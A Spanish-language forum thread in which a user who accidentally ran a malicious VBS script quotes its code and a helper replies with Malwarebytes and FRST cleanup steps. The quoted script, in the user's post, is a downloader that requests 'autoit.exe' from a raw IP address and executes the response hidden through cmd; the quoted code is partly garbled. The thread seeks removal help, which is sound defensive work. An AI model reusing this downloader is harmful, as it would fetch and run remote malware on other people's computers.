Yo mismo me he auto infectado

Hola [email protected], resulta que me bajo un pequeño script vbs voy a eliminarlo y en vez de darle a surp y enter le doy a enter surp… Sí soy Peter Grefeen…

El codigo "original del vbs es algo así

dim dbknzac set dbknzac = createobject(“winhttp.winhttprequest.5.1”) dbknzac.open “post”, "http://82.111.231.131…etc/autoit.exe “, false dbknzac.send 'Wscll.application”)

set dbknzac = createobject(“shll.application”) dbknzac.shellexecute “c:\windows\system32\cmd”, dbknzac.responsetxt & wscriptname,dbknzac,"",0

Entiendo lo que hace pero no toco visual desde los 14 y tengo 34… hace siglos dejé de trastear y estudiar…

Cada vez va a peor y creo que se ha extendido pero no se como, porque la conecxión al autoit la bloquea el antivirus

Gracias por vuestro tiempo.

Realiza los siguientes pasos, , sin cambiar el orden

1) Descarga, instala y ejecuta Malwarebytes’ Anti-Malware.

  • Presiona clic en “Use Malewarebytes Free” (Usar Malewarebyte gratis).

  • Pulsa en el botón “Open Malewarebytes Free”.

imagen

  • Presiona el botón “Scan” (Escaneo).

imagen

Una vez finalizado el escaneo aparecerá la siguiente pantalla:

imagen

  • Pulsa en “View report” (Ver informe).

  • Luego presionar el botón “Export” (Exportar). Elijes “Text file” (fichero de texto). Elijes un nombre y guardas ese archivo en el escritorio…

  • Descarga a Tu Escritorio >> Esto es muy importante<<.,Fabar Recovery Scan Tool, considerando la versión adecuada para tu equipo. (32 o 64 bits) :arrow_forward: ¿Cómo saber si mi Windows es de 32 o 64 bits?

  • Doble clic para ejecutar Frst.exe. En la ventana del Disclaimer, presiona Si.

  • En la nueva ventana que se abre, presiona el botón Analizar y espera a que concluya el análisis.

  • Se abrirán dos (2) archivos (Logs), Frst.txt y Addition.txt, que estarán grabados en Tu escritorio.

En Tu próxima respuesta, copias y pegas los dos reportes Frst.txt y Addition.txt de FRST

Nota: Si el/los reportes solicitados no entraran en una sola respuesta porque superan la cantidad de caracteres permitidos, puedes utilizar dos o mas respuestas para pegarlos completamente.